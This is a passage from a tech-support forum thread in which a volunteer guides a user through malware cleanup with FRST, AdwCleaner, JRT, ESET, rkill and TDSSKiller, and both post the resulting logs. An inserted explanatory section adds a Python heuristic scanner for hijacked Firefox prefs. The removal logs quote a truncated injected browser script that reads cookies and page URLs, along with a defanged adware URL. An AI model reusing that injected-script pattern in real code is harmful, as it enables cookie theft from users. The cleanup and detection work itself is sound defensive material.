Task: {FBFBCEAD-E579-4878-9540-FAE1CA7BBA78} - System32\Tasks\Hewlett-Packard\HP Assistant\PC Health Analysis => C:\Program Files\Hewlett-Packard\HP Support Framework\HPSF.exe [2009-07-10] (Hewlett-Packard)

(If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)

Task: C:\Windows\Tasks\Ad-Aware Update (Weekly).job => C:\Program Files\Lavasoft\Ad-Aware\Ad-AwareAdmin.exe
Task: C:\Windows\Tasks\Adobe Flash Player Updater.job => C:\Windows\system32\Macromed\Flash\FlashPlayerUpdateService.exe
Task: C:\Windows\Tasks\GoogleUpdateTaskUserS-1-5-21-1443430433-3504582150-3450442512-1000Core.job => C:\Users\VIJAY\AppData\Local\Google\Update\GoogleUpdate.exe
Task: C:\Windows\Tasks\GoogleUpdateTaskUserS-1-5-21-1443430433-3504582150-3450442512-1000UA.job => C:\Users\VIJAY\AppData\Local\Google\Update\GoogleUpdate.exe
Task: C:\Windows\Tasks\HPCeeScheduleForVIJAY.job => C:\Program Files\hewlett-packard\sdp\ceement\HPCEE.exe

==================== Loaded Modules (whitelisted) ==============

2014-06-19 01:12 - 2014-07-03 01:12 - 00107992 _____ () C:\Program Files\NVIDIA Corporation\Display\NvSmartMax.dll
2009-01-19 03:04 - 2009-01-19 03:04 - 00207728 _____ () C:\Program Files\Lavasoft\Ad-Aware\RPAPI.dll
2009-01-19 03:04 - 2009-01-19 03:04 - 01404256 _____ () C:\Program Files\Lavasoft\Ad-Aware\Resources.dll
2008-09-11 03:30 - 2008-09-11 03:30 - 00168960 _____ () C:\Program Files\Lavasoft\Ad-Aware\unrar.dll
2009-07-31 05:19 - 2009-07-31 05:19 - 00132384 _____ () C:\Program Files\WIDCOMM\Bluetooth Software\btkeyind.dll
2014-07-05 13:51 - 2011-03-02 12:40 - 00140288 _____ () C:\Program Files\WinRAR\rarext.dll
2009-01-19 03:04 - 2009-01-19 03:04 - 00079712 _____ () C:\Program Files\Lavasoft\Ad-Aware\ShellExt.dll
2010-11-16 19:07 - 2010-11-16 19:07 - 00264704 _____ () C:\ProgramData\DatacardService\HWDeviceService.exe
2009-08-25 05:59 - 2009-01-22 00:17 - 00247152 ____N () C:\Program Files\CyberLink\Shared files\RichVideo.exe
2014-09-27 15:54 - 2012-11-26 20:33 - 00275784 _____ () C:\Program Files\Reliance 3G\AssistantServices.exe
2011-09-14 23:11 - 2011-09-14 23:11 - 04993024 _____ () C:\Program Files\CheckPoint\Endpoint Connect\QtGui4.dll
2011-09-14 23:11 - 2011-09-14 23:11 - 01302528 _____ () C:\Program Files\CheckPoint\Endpoint Connect\QtCore4.dll
2011-09-14 23:11 - 2011-09-14 23:11 - 00028672 _____ () C:\Program Files\CheckPoint\Endpoint Connect\imageformats\qgif4.dll
2014-09-27 15:54 - 2012-11-26 20:34 - 00157000 _____ () C:\Program Files\Reliance 3G\UIExec.exe
2014-10-09 12:07 - 2014-09-27 23:18 - 05164792 _____ () C:\Q4SearchInstall\bin\Q4Search.exe
2011-06-28 20:12 - 2011-06-28 20:12 - 00381952 _____ () C:\Program Files\Vodafone\Vodafone Mobile Broadband\Bin\Vodafone.View.Taskbar.dll
2009-07-14 02:33 - 2009-07-14 06:45 - 00364544 _____ () C:\Windows\system32\msjetoledb40.dll
2009-06-18 00:10 - 2009-06-18 00:10 - 02121728 _____ () C:\Program Files\Common Files\LightScribe\QtCore4.dll
2009-06-18 00:10 - 2009-06-18 00:10 - 07745536 _____ () C:\Program Files\Common Files\LightScribe\QtGui4.dll
2009-06-18 00:10 - 2009-06-18 00:10 - 00135168 _____ () C:\Program Files\Common Files\LightScribe\plugins\imageformats\qjpeg4.dll
2009-07-02 04:14 - 2009-07-02 04:14 - 00632888 _____ () C:\Program Files\Hewlett-Packard\Shared\hpqToaster.exe
2015-02-10 02:18 - 2014-06-11 10:14 - 03765872 _____ () C:\Program Files\Mozilla Firefox\mozjs.dll
2015-02-06 09:01 - 2015-02-06 09:01 - 16852144 _____ () C:\Windows\system32\Macromed\Flash\NPSWF32_16_0_0_305.dll

==================== Alternate Data Streams (whitelisted) =========

(If an entry is included in the fixlist, only the Alternate Data Streams will be removed.)


==================== Safe Mode (whitelisted) ===================

(If an item is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)

HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\ccEvtMgr => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\ccSetMgr => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\Lavasoft Ad-Aware Service => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\Symantec Antivirus => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\Symantec Antvirus => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\Wdf01000.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\ccEvtMgr => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\ccSetMgr => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\Lavasoft Ad-Aware Service => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\SmcService => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\Symantec Antivirus => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\Symantec Antvirus => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\Wdf01000.sys => ""="Driver"

==================== EXE Association (whitelisted) ===============

(If an entry is included in the fixlist, the default will be restored. None default entries will be removed.)


==================== Other Registry Areas =====================

(Currently there is no automatic fix for this section.)

HKU\S-1-5-21-1443430433-3504582150-3450442512-1000\Control Panel\Desktop\\Wallpaper -> C:\Users\VIJAY\AppData\Roaming\Microsoft\Windows\Themes\TranscodedWallpaper.jpg

==================== MSCONFIG/TASK MANAGER disabled items ==

(Currently there is no automatic fix for this section.)

MSCONFIG\startupreg: MiPhoneManager => "C:\Users\VIJAY\AppData\Local\MiPhoneManager\main\MiPhoneHelper.exe"
MSCONFIG\startupreg: MobileBroadband => C:\Program Files\Vodafone\Vodafone Mobile Broadband\Bin\MobileBroadband.exe /silent
MSCONFIG\startupreg: OliveDcService => C:\Program Files\TATA Photon+\Olive\CE310\Drivers\OliveDcService.exe
MSCONFIG\startupreg: TATA Photon+ Dialer => "C:\Program Files\TATA Photon+\Olive\CE310\TTSL Olive CE310 Dialer Ver 1.1.7 Release 000.exe"
MSCONFIG\startupreg: VmbNotifier => C:\Program Files\Vodafone\Vodafone Mobile Broadband\Bin\VmbNotifier.exe

==================== Accounts: =============================

Administrator (S-1-5-21-1443430433-3504582150-3450442512-500 - Administrator - Disabled)
Guest (S-1-5-21-1443430433-3504582150-3450442512-501 - Limited - Disabled)
VIJAY (S-1-5-21-1443430433-3504582150-3450442512-1000 - Administrator - Enabled) => C:\Users\VIJAY

==================== Faulty Device Manager Devices =============

Name: Teredo Tunneling Pseudo-Interface
Description: Microsoft Teredo Tunneling Adapter
Class Guid: {4d36e972-e325-11ce-bfc1-08002be10318}
Manufacturer: Microsoft
Service: tunnel
Problem: : This device cannot start. (Code10)
Resolution: Device failed to start. Click "Update Driver" to update the drivers for this device.
On the "General Properties" tab of the device, click "Troubleshoot" to start the troubleshooting wizard.


==================== Event log errors: =========================

Application errors:
==================
Error: (02/11/2015 11:57:36 AM) (Source: VmbService) (EventID: 0) (User: )
Description: conflictManagerTypeValue

Error: (02/11/2015 11:55:50 AM) (Source: VmbService) (EventID: 0) (User: )
Description: conflictManagerTypeValue

Error: (02/11/2015 11:17:45 AM) (Source: SescLU) (EventID: 13) (User: )
Description: LiveUpdate returned a non-critical error.  Available content updates may have failed to install.

Error: (02/11/2015 01:46:43 AM) (Source: Office 2013 Licensing Service) (EventID: 0) (User: )
Description: Subscription licensing service failed: -1073418154

Error: (02/11/2015 01:46:22 AM) (Source: SescLU) (EventID: 13) (User: )
Description: LiveUpdate returned a non-critical error.  Available content updates may have failed to install.

Error: (02/10/2015 11:41:52 AM) (Source: VmbService) (EventID: 0) (User: )
Description: conflictManagerTypeValue

Error: (02/10/2015 11:27:50 AM) (Source: VmbService) (EventID: 0) (User: )
Description: conflictManagerTypeValue

Error: (02/10/2015 11:25:41 AM) (Source: VSS) (EventID: 8193) (User: )
Description: Volume Shadow Copy Service error: Unexpected error calling routine RegSetValueExW(0x00000170,SYSTEM\CurrentControlSet\Services\VSS\Diag\VssvcPublisher,0,REG_BINARY,025EF8D8.64).  hr = 0x80070005, Access is denied.
.

Error: (02/10/2015 11:25:41 AM) (Source: VSS) (EventID: 8193) (User: )
Description: Volume Shadow Copy Service error: Unexpected error calling routine RegSetValueExW(0x000006c8,(null),0,REG_BINARY,01D6EEC0.64).  hr = 0x80070005, Access is denied.
.


Operation:
   BackupShutdown Event

Context:
   Execution Context: Writer
   Writer Class Id: {a6ad56c2-b509-4e6c-bb19-49d8f43532f0}
   Writer Name: WMI Writer
   Writer Instance ID: {3ac2141b-bb93-44eb-91c6-db8a93217816}

Error: (02/10/2015 11:25:41 AM) (Source: VSS) (EventID: 8193) (User: )
Description: Volume Shadow Copy Service error: Unexpected error calling routine RegSetValueExW(0x000006c8,(null),0,REG_BINARY,01D6EEAC.64).  hr = 0x80070005, Access is denied.
.


Operation:
   BackupShutdown Event

Context:
   Execution Context: Writer
   Writer Class Id: {a6ad56c2-b509-4e6c-bb19-49d8f43532f0}
   Writer Name: WMI Writer
   Writer Instance ID: {3ac2141b-bb93-44eb-91c6-db8a93217816}


System errors:
=============
Error: (02/11/2015 11:59:12 AM) (Source: Microsoft-Windows-Application-Experience) (EventID: 205) (User: NT AUTHORITY)
Description: The Program Compatibility Assistant service failed to perform the phase two initialization.

Error: (02/11/2015 11:56:24 AM) (Source: Microsoft-Windows-WLAN-AutoConfig) (EventID: 10003) (User: NT AUTHORITY)
Description: WLAN Extensibility Module has stopped unexpectedly.

Module Path: C:\Windows\System32\bcmihvsrv.dll

Error: (02/11/2015 11:56:24 AM) (Source: Microsoft-Windows-WLAN-AutoConfig) (EventID: 10003) (User: NT AUTHORITY)
Description: WLAN Extensibility Module has stopped unexpectedly.

Module Path: C:\Windows\System32\bcmihvsrv.dll

Error: (02/11/2015 11:56:17 AM) (Source: Microsoft-Windows-WLAN-AutoConfig) (EventID: 10003) (User: NT AUTHORITY)
Description: WLAN Extensibility Module has stopped unexpectedly.

Module Path: C:\Windows\System32\bcmihvsrv.dll

Error: (02/11/2015 11:55:20 AM) (Source: Service Control Manager) (EventID: 7032) (User: )
Description: The Service Control Manager tried to take a corrective action (Restart the service) after the unexpected termination of the Windows Search service, but this action failed with the following error:
%%1056

Error: (02/11/2015 11:54:58 AM) (Source: Service Control Manager) (EventID: 7032) (User: )
Description: The Service Control Manager tried to take a corrective action (Restart the service) after the unexpected termination of the Symantec Endpoint Protection service, but this action failed with the following error:
%%1056

Error: (02/11/2015 11:54:51 AM) (Source: Service Control Manager) (EventID: 7034) (User: )
Description: The Com4QLBEx service terminated unexpectedly.  It has done this 1 time(s).

Error: (02/11/2015 11:54:50 AM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: The HP Health Check Service service terminated unexpectedly.  It has done this 1 time(s).  The following corrective action will be taken in 60000 milliseconds: Restart the service.

Error: (02/11/2015 11:54:50 AM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: The Windows Search service terminated unexpectedly.  It has done this 1 time(s).  The following corrective action will be taken in 30000 milliseconds: Restart the service.

Error: (02/11/2015 11:54:48 AM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: The Windows Live ID Sign-in Assistant service terminated unexpectedly.  It has done this 1 time(s).  The following corrective action will be taken in 10000 milliseconds: Restart the service.


Microsoft Office Sessions:
=========================
Error: (02/11/2015 11:57:36 AM) (Source: VmbService) (EventID: 0) (User: )
Description: conflictManagerTypeValue

Error: (02/11/2015 11:55:50 AM) (Source: VmbService) (EventID: 0) (User: )
Description: conflictManagerTypeValue

Error: (02/11/2015 11:17:45 AM) (Source: SescLU) (EventID: 13) (User: )
Description: LiveUpdate returned a non-critical error.  Available content updates may have failed to install.

Error: (02/11/2015 01:46:43 AM) (Source: Office 2013 Licensing Service) (EventID: 0) (User: )
Description: Subscription licensing service failed: -1073418154

Error: (02/11/2015 01:46:22 AM) (Source: SescLU) (EventID: 13) (User: )
Description: LiveUpdate returned a non-critical error.  Available content updates may have failed to install.

Error: (02/10/2015 11:41:52 AM) (Source: VmbService) (EventID: 0) (User: )
Description: conflictManagerTypeValue

Error: (02/10/2015 11:27:50 AM) (Source: VmbService) (EventID: 0) (User: )
Description: conflictManagerTypeValue

Error: (02/10/2015 11:25:41 AM) (Source: VSS) (EventID: 8193) (User: )
Description: RegSetValueExW(0x00000170,SYSTEM\CurrentControlSet\Services\VSS\Diag\VssvcPublisher,0,REG_BINARY,025EF8D8.64)0x80070005, Access is denied.

Error: (02/10/2015 11:25:41 AM) (Source: VSS) (EventID: 8193) (User: )
Description: RegSetValueExW(0x000006c8,(null),0,REG_BINARY,01D6EEC0.64)0x80070005, Access is denied.


Operation:
   BackupShutdown Event

Context:
   Execution Context: Writer
   Writer Class Id: {a6ad56c2-b509-4e6c-bb19-49d8f43532f0}
   Writer Name: WMI Writer
   Writer Instance ID: {3ac2141b-bb93-44eb-91c6-db8a93217816}

Error: (02/10/2015 11:25:41 AM) (Source: VSS) (EventID: 8193) (User: )
Description: RegSetValueExW(0x000006c8,(null),0,REG_BINARY,01D6EEAC.64)0x80070005, Access is denied.


Operation:
   BackupShutdown Event

Context:
   Execution Context: Writer
   Writer Class Id: {a6ad56c2-b509-4e6c-bb19-49d8f43532f0}
   Writer Name: WMI Writer
   Writer Instance ID: {3ac2141b-bb93-44eb-91c6-db8a93217816}


==================== Memory info ===========================

Processor: Intel® Core™2 Duo CPU T6600 @ 2.20GHz
Percentage of memory in use: 46%
Total physical RAM: 3038.96 MB
Available physical RAM: 1615.91 MB
Total Pagefile: 6076.2 MB
Available Pagefile: 4313.82 MB
Total Virtual: 2047.88 MB
Available Virtual: 1908.59 MB

==================== Drives ================================

Drive c: () (Fixed) (Total:143.13 GB) (Free:13.23 GB) NTFS ==>[System with boot components (obtained from reading drive)]
Drive d: (New Volume) (Fixed) (Total:142.02 GB) (Free:8.17 GB) NTFS
Drive e: (RECOVERY) (Fixed) (Total:12.74 GB) (Free:2.07 GB) NTFS ==>[System with boot components (obtained from reading drive)]

==================== MBR & Partition Table ==================

========================================================
Disk: 0 (Size: 298.1 GB) (Disk ID: 2D20BDEB)
Partition 1: (Active) - (Size=199 MB) - (Type=07 NTFS)
Partition 2: (Not Active) - (Size=143.1 GB) - (Type=07 NTFS)
Partition 3: (Not Active) - (Size=142 GB) - (Type=OF Extended)
Partition 4: (Not Active) - (Size=12.7 GB) - (Type=07 NTFS)

==================== End Of Log ============================



#7 OCD

Posted 11 February 2015 - 09:01 PM

Hi vijay.gupta,

Is your Symantec Endpoint Protection a paid version?

=========================

Malwarebytes' Anti-Malware

  • Download Malwarebytes' Anti-Malware (save it to your desktop).
    • Windows XP: Double-click on the icon to run it.
    • Windows Vista, Windows 7 & 8: Right-click and select "Run as Administrator".
  • Select Scan tab.
  • Select type of scan to perform:
    • Threat Scan <--- Select this type of scan
    • Custom Scan
    • Hyper Scan
  • Next click the Scan button.
  • When the scan is complete, if no malicious items are found you can close the program.
  • If malicious items are found be sure that everything is checked, and click Quarantine.
  • When completed, a log will open in Notepad. Please save it to a convenient location and post the results.
  • Note: If you receive a notice that some of the items couldn't be removed, that they have been added to the delete on reboot list, please reboot.
=========================

ESET Online Scanner

*Note:
  • It is recommended to disable your on-board antivirus and anti-spyware programs while performing scans so there are no conflicts and it will speed up scan time.
  • Please don't go surfing while your resident protection is disabled!
  • Once the scan is finished remember to re-enable your antivirus along with your anti-spyware programs.
** You need to run your browser with Administrator Rights. To do so, right-click your browser's shortcut and select "Run as Administrator".

= = = = = = = = = = = = = = = = = = = =

Go here to run ESET Online Scanner

(Note: You can use Internet Explorer or Firefox for this scan. If you use Firefox you will be asked to install an additional component. Please allow this.)
  • Tick the box next to YES, I accept the Terms of Use.
  • Click Start
  • When asked, allow the ActiveX control to install
  • Disable your Antivirus software. You can usually do this with its Notification Tray icon near the clock
  • Click Start
  • Make sure that the option "Remove found threats" is Checked, and the option "Scan unwanted applications" is Checked.
  • Click Scan.
  • Wait for the scan to finish.
  • When the scan completes, click List of found threats
  • Click Export to Text file and save the file to your desktop using a unique name, such as ESETScan.
  • Include the contents of this report in your next reply

    Note - when ESET doesn't find any threats, no report will be created.
  • Push the back button.
  • Push Finish
  • Re-enable your Antivirus software.

=========================

In your next post please provide the following:
  • MBAM log
  • ESET's log.txt

OCD


#8 vijay.gupta


Posted 13 February 2015 - 01:19 AM

Yes. It's a corporate paid version.

Malwarebytes' Anti-Malware didn't find anything suspicious. That's why it didn't generate any log.

ESET Log:

C:\Users\All Users\hoifinhnlbhamdnldibkogbgiiefbnfh\Z84P4.js    JS/Kryptik.ATB trojan    
C:\ProgramData\hoifinhnlbhamdnldibkogbgiiefbnfh\Z84P4.js    JS/Kryptik.ATB trojan    cleaned by deleting - quarantined
C:\Users\VIJAY\Downloads\S5830i_Modem_Files.zip.exe    a variant of Win32/Adware.MultiPlug.ET application    cleaned by deleting - quarantined
D:\data\kismat\New folder\Bhaji In Problem (2013) DVDRip - XviD - 1CD - Esub - [DDR].lnk    LNK/Agent.AK trojan    cleaned by deleting - quarantined
D:\data\kismat\New folder\The Croods (2013) 720p Blu-Ray x264 [Dual-Audio] [English + Hindi DD 5.lnk    LNK/Agent.AK trojan    cleaned by deleting - quarantined
D:\dumps\NbuExplorer_v3.2_SomotoBinno.exe    Win32/Somoto.E potentially unwanted application    deleted - quarantined
 



#9 vijay.gupta


Posted 13 February 2015 - 01:20 AM

Also, I have not uninstalled either of the applications, ESET and Malwarebytes. Please let me know if I need to do so.



#10 OCD

Posted 13 February 2015 - 01:51 AM

Hi vijay.gupta,

Hold off removing any tools in case we have to use them again.

Try uninstalling your Symantec Endpoint Protection, reboot then reinstall the program and see if you are able to obtain the latest definitions.

Re-run AdwCleaner

It should be on your desktop
    • Windows XP : Double click on the icon to run it.
    • Windows Vista, Windows 7 & 8 : Right click and select "Run as Administrator"
  • Click on the Scan button.
  • AdwCleaner will begin to scan your computer like it did before.
  • After the scan has finished...
  • This time, click on the Clean button.
  • Press OK when asked to close all programs and follow the onscreen prompts.
  • Press OK again to allow AdwCleaner to restart the computer and complete the removal process.
  • After rebooting, a log file report (AdwCleaner[S0].txt) will open automatically.
  • Copy and paste the contents of that log file in your next reply.
  • A copy of that log file will also be saved in the C:\AdwCleaner folder.
=========================

Junkware Removal Tool

Download Junkware Removal Tool to your desktop.
    • Windows XP : Double click on the icon to run it.
    • Windows Vista, Windows 7 & 8 : Right click and select "Run as Administrator"
  • Shut down your protection software now to avoid potential conflicts.
  • The tool will open and start scanning your system.
  • Please be patient as this can take a while to complete depending on your system's specifications.
  • On completion, a log (JRT.txt) is saved to your desktop and will automatically open.
  • Post the contents of JRT.txt into your next message.
=========================

FRST Fix Script

Open notepad. Please copy the contents of the code box below. To do this highlight the contents of the box and right click on it. Paste this into the open notepad. Save it on the desktop as fixlist.txt

    Start
    C:\Users\All Users\hoifinhnlbhamdnldibkogbgiiefbnfh\Z84P4.js
    End

NOTICE: This script was written specifically for this user, for use on that particular machine. Running this on another machine may cause damage to your operating system.

Run FRST and press the Fix button just once and wait.
The tool will make a log (Fixlog.txt) please post it to your reply.

=========================

In your next post please provide the following:
  • AdwCleaner[S0].txt
  • JRT.txt
  • Fixlog.txt
  • Update on AV

OCD


#11 vijay.gupta


Posted 13 February 2015 - 04:38 AM

First, I tried repairing the antivirus but it didn't help. Then, I tried uninstalling and reinstalling it but it also didn't help.

It seems that there is something that is blocking the update of the antivirus. After the AdwCleaner scan was complete, there was some detection by the antivirus that said something like "Updation process was terminated".

AdwCleaner[S0].txt

 

# AdwCleaner v4.110 - Logfile created 13/02/2015 at 15:40:09
# Updated 05/02/2015 by Xplode
# Database : 2015-02-13.1 [Server]
# Operating system : Windows 7 Home Basic Service Pack 1 (x86)
# Username : VIJAY - VIJAY-PC
# Running from : C:\Users\VIJAY\Desktop\AdwCleaner.exe
# Option : Cleaning

***** [ Services ] *****


***** [ Files / Folders ] *****


***** [ Scheduled tasks ] *****


***** [ Shortcuts ] *****


***** [ Registry ] *****


***** [ Web browsers ] *****

-\\ Internet Explorer v11.0.9600.17631


-\\ Mozilla Firefox v36.0 (x86 en-US)

[agyg75sl.default\prefs.js] - Line Deleted : user_pref("extensions.dGngmy3KVsGqkpGt.scode", "try{(function(){try{var url=(window.self.location.href + document.cookie);if(url.indexOf(\"rjrErTwEqdw5qTnEpja7rdY9qHk\")>-1url.indexOf(\"acebook\")>-[...]

-\\ Google Chrome v


*************************

AdwCleaner[R0].txt - [1013 bytes] - [11/02/2015 11:46:34]
AdwCleaner[R1].txt - [1072 bytes] - [13/02/2015 15:30:57]
AdwCleaner[S0].txt - [1010 bytes] - [13/02/2015 15:40:09]

########## EOF - C:\AdwCleaner\AdwCleaner[S0].txt - [1069  bytes] ##########

 

JRT.txt

 

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Junkware Removal Tool (JRT) by Thisisu
Version: 6.4.2 (02.02.2015:1)
OS: Windows 7 Home Basic x86
Ran by VIJAY on 13-02-2015 at 15:49:52.52
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~




~~~ Services



~~~ Registry Values



~~~ Registry Keys



~~~ Files



~~~ Folders



~~~ FireFox

Successfully deleted the following from C:\Users\VIJAY\AppData\Roaming\mozilla\firefox\profiles\agyg75sl.default\prefs.js

user_pref("browser.search.searchengine.desc", "this is my first firefox searchEngine");
user_pref("browser.search.searchengine.ptid", "wpc");
user_pref("browser.search.searchengine.uid", "HitachiXHTS723232L9A360_090816FCC400NEHATBLGX");
user_pref("extensions.pzDbLOABfOSiFt42.url", "hxxp://storageinstallbardirectory.in/sync2/?q=hfZ9ofV9CShEAen0rTa9pjkMg708BNmGWj8tjShGheDUojw8rdsEpjw4qdwGrchIC7n0rjkErTa4rjU9qdw
Emptied folder: C:\Users\VIJAY\AppData\Roaming\mozilla\firefox\profiles\agyg75sl.default\minidumps [48 files]



~~~ Event Viewer Logs were cleared





~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Scan was completed on 13-02-2015 at 15:52:58.64
End of JRT log
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Fixlog.txt

 

Fix result of Farbar Recovery Tool (FRST written by Farbar) (x86) Version: 12-02-2015
Ran by VIJAY at 2015-02-13 15:59:37 Run:2
Running from C:\Users\VIJAY\Desktop
Loaded Profiles: VIJAY (Available profiles: VIJAY)
Boot Mode: Normal

==============================================

Content of fixlist:
*****************
Start
C:\Users\All Users\hoifinhnlbhamdnldibkogbgiiefbnfh\Z84P4.js
End
*****************

"C:\Users\All Users\hoifinhnlbhamdnldibkogbgiiefbnfh\Z84P4.js" => File/Directory not found.

==== End of Fixlog 15:59:37 ====
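
The AdwCleaner and JRT logs in the post above show what was removed from the Firefox profile: `user_pref` entries under randomly named `extensions.<id>` branches (one of them holding script code) and `browser.search.searchengine.*` overrides. As an added example, not part of the original thread or of either tool, this Python script applies those three patterns as heuristics to a prefs.js body; the regexes, the marker strings and the sample values are assumptions constructed for illustration.

```python
import json
import re

# One preference per line: user_pref("name", value);
PREF_RE = re.compile(r'^\s*user_pref\("((?:[^"\\]|\\.)*)",\s*(.*)\);\s*$')

# Heuristics modelled on the entries removed in this thread (assumptions for
# illustration; these are not AdwCleaner's or JRT's actual signatures).
RANDOM_EXT_BRANCH = re.compile(r'^extensions\.([A-Za-z0-9]{16})\.\w+$')
SEARCH_OVERRIDE = re.compile(r'^browser\.search\.searchengine\.(desc|ptid|uid)$')
SCRIPT_MARKERS = ("(function(", "document.cookie", "location.href", "eval(")

# Constructed sample input, shaped like the prefs.js lines quoted in the logs.
SAMPLE_PREFS = r'''
// Mozilla User Preferences (constructed sample)
user_pref("browser.startup.homepage", "https://www.example.org/");
user_pref("extensions.aB3dE5fG7hJ9kL1m.scode", "try{(function(){var u=window.self.location.href+document.cookie;if(u.indexOf(\"CONSTRUCTED\")>-1){}})();}catch(e){}");
user_pref("extensions.aB3dE5fG7hJ9kL1m.url", "hxxp://placeholder.invalid/sync/?q=CONSTRUCTED");
user_pref("browser.search.searchengine.ptid", "wpc");
user_pref("extensions.lastAppVersion", "36.0");
user_pref("network.cookie.prefsMigrated", true);
'''


def parse_prefs(text):
    """Yield (line_no, name, value) for every user_pref line in a prefs.js body."""
    for line_no, line in enumerate(text.splitlines(), 1):
        match = PREF_RE.match(line)
        if not match:
            continue  # comments, blank lines, anything that is not a pref
        name, raw = match.group(1), match.group(2).strip()
        try:
            value = json.loads(raw)  # pref strings, numbers and booleans parse as JSON
        except ValueError:
            value = raw              # keep undecodable values exactly as written
        yield line_no, name, value


def is_random_branch(name):
    """True for extensions.<16 mixed-case alphanumerics>.<key>, the shape seen in the logs."""
    match = RANDOM_EXT_BRANCH.match(name)
    if not match:
        return False
    token = match.group(1)
    return any(c.isupper() for c in token) and any(c.islower() for c in token)


def scan_prefs(text):
    """Return [(line_no, name, [reasons])] for prefs that deserve a manual look."""
    findings = []
    for line_no, name, value in parse_prefs(text):
        reasons = []
        if is_random_branch(name):
            reasons.append("random-extension-branch")
        if isinstance(value, str) and any(m in value for m in SCRIPT_MARKERS):
            reasons.append("script-in-value")
        if SEARCH_OVERRIDE.match(name):
            reasons.append("search-engine-override")
        if reasons:
            findings.append((line_no, name, reasons))
    return findings


if __name__ == "__main__":
    for line_no, name, reasons in scan_prefs(SAMPLE_PREFS):
        print(f"line {line_no}: {name} -> {', '.join(reasons)}")
```

A hit is a prompt for review rather than a verdict: a legitimate extension could in principle use a 16-character mixed-case branch name, so check the flagged entries against the installed add-ons before deleting anything.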

 



#12 OCD

Posted 13 February 2015 - 09:23 AM

Hi vijay.gupta,

Yes. It's a corporate paid version.

Is this a company computer?
Is there more than one computer that displays this issue?
 

First, I tried repairing the antivirus but it didn't help. Then, I tried uninstalling and reinstalling it but it also didn't help.


Try running this tool, then immediately try and update your virus definitions.

rkill

Print out these instructions as we may need to close every window that is open later in the fix.

It is possible that the infection you are trying to remove will not allow you to download files on the infected computer. If this is the case, then you will need to download the files requested in this guide on another computer and then transfer them to the infected computer. You can transfer the files via a CD/DVD, external drive, or USB flash drive.

Do not reboot your computer after running rkill as the malware programs will start again.

Please download and run the following tool to help allow other programs to run. (courtesy of BleepingComputer.com)
There are 5 different versions. If one of them won't run then download and try to run the other one.

  • Windows XP : Double click on the icon to run it.
  • Windows Vista, Windows 7 & 8 : Right click and select "Run as Administrator"

You only need to get one of them to run, not all of them.

Do not reboot your computer after running rkill as the malware programs will start again.

=========================

Try and update virus definitions, if unsuccessful continue with the next step. If successful stop and report back (skip next step).

=========================

TDSSKiller

Please download TDSSKiller.zip - Extract it to your desktop
or from here >> http://www.bleepingc...oad/tdsskiller/

  • TDSSKiller.exe
    • Windows XP : Double click on the icon to run it.
    • Windows Vista, Windows 7 & 8 : Right click and select "Run as Administrator"
    Select Change Parameters.

    Under Additional Options, select all options. Then select OK.

    Next press the Start Scan button.

    • Only if Malicious objects are found then ensure Cure is selected
    • Then click Continue > Reboot now
  • Copy and paste the log in your next reply
    • A copy of the log will be saved automatically to the root of the drive (typically C:\)

=========================

In your next post please provide the following:

  • TDSSKiller log
  • Update on AV

OCD


#13 vijay.gupta


Posted 14 February 2015 - 10:33 AM

It is not an office computer but my personal laptop, and the antivirus is provided by the company. No, it is not happening on multiple computers.

Both the logs are pasted below. When I ran TDSSKiller, 2 threats were found with medium risk. But it is the exe file for the dongle through which the Internet is running. So I skipped deleting them. I have attached the screenshot of the threats. Please let me know if I should still delete them and check if it fixes the issue.

The issue is still not fixed.

RKill.exe

 

Rkill 2.7.0 by Lawrence Abrams (Grinler)
http://www.bleepingcomputer.com/
Copyright 2008-2015 BleepingComputer.com
More Information about Rkill can be found at this link:
 http://www.bleepingc...opic308364.html

Program started at: 02/14/2015 09:44:32 PM in x86 mode.
Windows Version: Windows 7 Home Basic Service Pack 1

Checking for Windows services to stop:

 * No malware services found to stop.

Checking for processes to terminate:

 * C:\ProgramData\DatacardService\HWDeviceService.exe (PID: 2344) [AU-HEUR]
 * C:\ProgramData\DatacardService\DCSHelper.exe (PID: 2420) [AU-HEUR]

2 proccesses terminated!

Checking Registry for malware related settings:

 * No issues found in the Registry.

Resetting .EXE, .COM, & .BAT associations in the Windows Registry.

Performing miscellaneous checks:

 * Windows Defender Disabled

   [HKLM\SOFTWARE\Microsoft\Windows Defender]
   "DisableAntiSpyware" = dword:00000001

Checking Windows Service Integrity:

 * Windows Defender (WinDefend) is not Running.
   Startup Type set to: Manual

Searching for Missing Digital Signatures:

 * No issues found.

Checking HOSTS File:

 * No issues found.

Program finished at: 02/14/2015 09:45:59 PM
Execution time: 0 hours(s), 1 minute(s), and 27 seconds(s)
 

 

TDSSKiller Log:

 

21:53:06.0101 0x1cb8  TDSS rootkit removing tool 3.0.0.44 Jan 22 2015 08:27:04
21:53:12.0871 0x1cb8  ============================================================
